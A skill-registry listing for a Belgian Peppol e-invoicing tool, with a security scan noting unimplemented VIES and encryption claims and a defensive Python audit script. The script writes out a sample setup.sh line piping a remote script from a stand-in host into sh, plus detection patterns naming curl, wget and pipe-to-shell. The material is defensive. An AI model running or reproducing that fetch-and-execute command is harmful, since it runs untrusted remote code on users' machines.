Skill flagged — suspicious patterns detected

ClawHub Security flagged this skill as suspicious. Review the scan results before using.

Nex Einvoice

v1.0.0

Generate Belgian-compliant e-invoices in the Peppol BIS 3.0 UBL format from natural language input in Dutch or English, satisfying mandatory requirements for...

by Nex AI (@nexaiguy)
License: MIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
Capability signals
Crypto: Can make purchases
These labels describe what authority the skill may exercise. They are separate from suspicious or malicious moderation verdicts.
VirusTotal: Benign
OpenClaw: Suspicious (high confidence)
Purpose & Capability (flagged)
Name/description promise: Belgian Peppol UBL invoices, VAT validation against EU VIES, encrypted local storage. What the code shows: a CLI and library that parse natural language, produce UBL XML, and store invoices in a plain SQLite DB under ~/.nex-einvoice (config.py). No code in the provided files calls EU VIES; VAT validation is a local modulo check, which confirms only that a number is well formed, not that it belongs to a registered business. The claimed 'encrypted' storage is not implemented in the shown storage.py (plain SQLite). README and SKILL.md also reference different data paths (~/.einvoice vs ~/.nex-einvoice) and list a templates/* fileset that is not present in the manifest. These mismatches indicate that the metadata/marketing text is not aligned with the actual implementation.
Instruction Scope (flagged)
SKILL.md instructs running setup.sh and using the nex-einvoice CLI; the runtime instructions themselves are reasonably scoped to invoicing. However, SKILL.md and README assert behaviors that the code does not implement (external VIES validation, no telemetry, encrypted DB). The CLI and libraries read and write local files, apply environment defaults, and create a local SQLite DB, which is consistent with the instructions, but nothing in the provided code shows the external VIES calls claimed in the documentation or any encryption of the DB. Verify the full setup.sh and any omitted files for network calls before trusting the 'no external API calls' claim.
Install Mechanism
This is an instruction+code bundle with no download/install spec in the registry (lowest risk). It ships source files and a setup.sh. The install mechanism is manual (run setup.sh); there are no remote installers or fetched archives in the registry metadata. Review setup.sh before running it to confirm it does not fetch or execute remote code.
Credentials
The registry declares no required env vars; config.py does read a number of optional NEX_EINVOICE_* environment variables to prefill seller/payment defaults (expected for a CLI invoicing tool). That is proportional. Note that some seller/payment defaults are sensitive (IBAN, BIC, email addresses) and are stored locally in JSON files under the data dir. The skill does not declare these as required; they are optional inputs read from the environment if present.
Persistence & Privilege
The manifest sets always: false, and the skill is user-invocable and autonomous by default (normal). The skill creates and persists its own data under a data directory; storage.py sets restrictive Unix permissions on that directory where possible. From the shown code it does not modify other skills or system-wide settings.
What to consider before installing
This skill appears to implement a local invoice generator and CLI, but the documentation and code disagree on several important points. Before installing or running it:
1) Inspect setup.sh (it will be executed during setup) to ensure it does not download or run remote code.
2) If you rely on EU VIES VAT validation or on encrypted storage, note that the provided code implements only a local VAT checksum and stores invoices in plain SQLite files (no DB encryption in the visible code).
3) Confirm where data will live: config.py defaults to ~/.nex-einvoice while the README references ~/.einvoice, so check DATA_DIR.
4) Check for missing files (templates/* is referenced in metadata but absent) and for network calls in files omitted from the excerpt.
5) If you will store sensitive payment info (IBAN) in the seller/payment JSON files, make sure you trust the machine, and back up or encrypt those files yourself if needed.
If you want stronger assurance that the tool behaves as advertised, ask the publisher for the full contents of setup.sh and any omitted files, an explicit statement (and implementation) of VIES integration, and proof/implementation of on-disk encryption for the database.
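The checklist above is manual. The Python below is an added example, not code from the skill, its publisher, or the ClawHub scanner; it automates the checks a reviewer can run offline against an unpacked bundle: grep setup.sh and the libraries for network and remote-execution indicators, confirm from its 16-byte header whether a SQLite file is plaintext, and verify the data directory is private. It also shows why a local modulo check is not VIES: the checksum function is the standard Belgian enterprise-number rule (last two digits equal 97 minus the first eight digits mod 97), used here as an assumption about what a "local modulo check" does rather than as the skill's own code, and it accepts any well-formed number whether or not a business is registered under it. The file names, the sample setup.sh, and the SQLite database are constructed inline so the script runs without the real skill.

```python
"""Offline audit of an unpacked skill bundle (added example, not the skill's code)."""
from __future__ import annotations

import os
import re
import sqlite3
import stat
import tempfile
from pathlib import Path

# Indicators of outbound network use or remote code execution in shell/Python sources.
NETWORK_PATTERNS = [
    r"\bcurl\b", r"\bwget\b", r"\brequests\.", r"\burllib\b", r"\bhttpx\b",
    r"\bsocket\.", r"https?://", r"\bpip\s+install\b", r"\|\s*(ba)?sh\b",
]
SQLITE_MAGIC = b"SQLite format 3\x00"  # first 16 bytes of every plaintext SQLite file


def scan_for_network_calls(root: Path) -> dict[str, list[str]]:
    """Map each text file under root to the lines matching a network/remote-exec pattern."""
    hits: dict[str, list[str]] = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        raw = path.read_bytes()
        if b"\x00" in raw:  # binary file (e.g. the SQLite database): skip
            continue
        text = raw.decode("utf-8", errors="replace")
        matches = [ln.strip() for ln in text.splitlines()
                   if any(re.search(p, ln) for p in NETWORK_PATTERNS)]
        if matches:
            hits[str(path.relative_to(root))] = matches
    return hits


def is_plaintext_sqlite(db_path: Path) -> bool:
    """An unencrypted SQLite database starts with the literal header; page-level
    encryption (SQLCipher-style) would leave those bytes unreadable."""
    with open(db_path, "rb") as fh:
        return fh.read(len(SQLITE_MAGIC)) == SQLITE_MAGIC


def dir_is_private(path: Path) -> bool:
    """True when the directory grants no permission bits to group or others (0o700-style)."""
    mode = stat.S_IMODE(path.stat().st_mode)
    return mode & (stat.S_IRWXG | stat.S_IRWXO) == 0


def be_vat_checksum_ok(vat: str) -> bool:
    """Standard Belgian enterprise-number checksum, assumed here to be what a 'local
    modulo check' does: last two digits == 97 - (first eight digits mod 97).
    Passing proves the number is well formed, not that it is registered; only a
    VIES lookup answers the second question."""
    digits = vat.strip().upper().removeprefix("BE")
    if len(digits) != 10 or not digits.isdigit():
        return False
    return int(digits[8:]) == 97 - int(digits[:8]) % 97


def build_sample_bundle() -> Path:
    """Constructed sample, not the real skill: a setup.sh that pipes a remote script
    into sh, a clean helper module, and a plain SQLite DB inside a 0o700 data dir."""
    root = Path(tempfile.mkdtemp(prefix="skill-audit-"))
    (root / "setup.sh").write_text(
        "#!/bin/sh\n"
        "pip install -r requirements.txt\n"
        "curl -fsSL https://example.invalid/post-install.sh | sh\n"
    )
    (root / "vat.py").write_text("def check(n):\n    return len(n) == 12\n")
    data_dir = root / "data"
    data_dir.mkdir()
    os.chmod(data_dir, 0o700)
    con = sqlite3.connect(data_dir / "invoices.db")
    con.execute("CREATE TABLE invoices (id INTEGER PRIMARY KEY, xml TEXT)")
    con.execute("INSERT INTO invoices (xml) VALUES ('<Invoice/>')")
    con.commit()
    con.close()
    return root


def audit_bundle(root: Path, db_rel: str = "data/invoices.db") -> dict:
    """Run the three offline checks and return a summary a reviewer can act on."""
    db = root / db_rel
    return {
        "network_hits": scan_for_network_calls(root),
        "db_plaintext": is_plaintext_sqlite(db) if db.exists() else None,
        "data_dir_private": dir_is_private(db.parent) if db.exists() else None,
    }


if __name__ == "__main__":
    report = audit_bundle(build_sample_bundle())
    for path, lines in report["network_hits"].items():
        print(f"{path}: {len(lines)} network/remote-exec line(s)")
        for ln in lines:
            print("   ", ln)
    print("DB is plaintext SQLite:", report["db_plaintext"])
    print("data dir is private:", report["data_dir_private"])
    print("BE0123456749 passes checksum:", be_vat_checksum_ok("BE0123456749"))
```

To run this against a real download, replace build_sample_bundle() with the path of the unpacked zip and point db_rel at wherever DATA_DIR resolves (~/.nex-einvoice per config.py). A hit list that is empty is necessary but not sufficient: a script can still fetch code through an interpreter it invokes, so read setup.sh in full rather than trusting the grep alone.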

Like a lobster shell, security has layers — review code before you run it.

latest: vk973pxcqsf5g4s1rw6ge8d0svn8491hv


Runtime requirements

🧾 Clawdis
Bins: python3
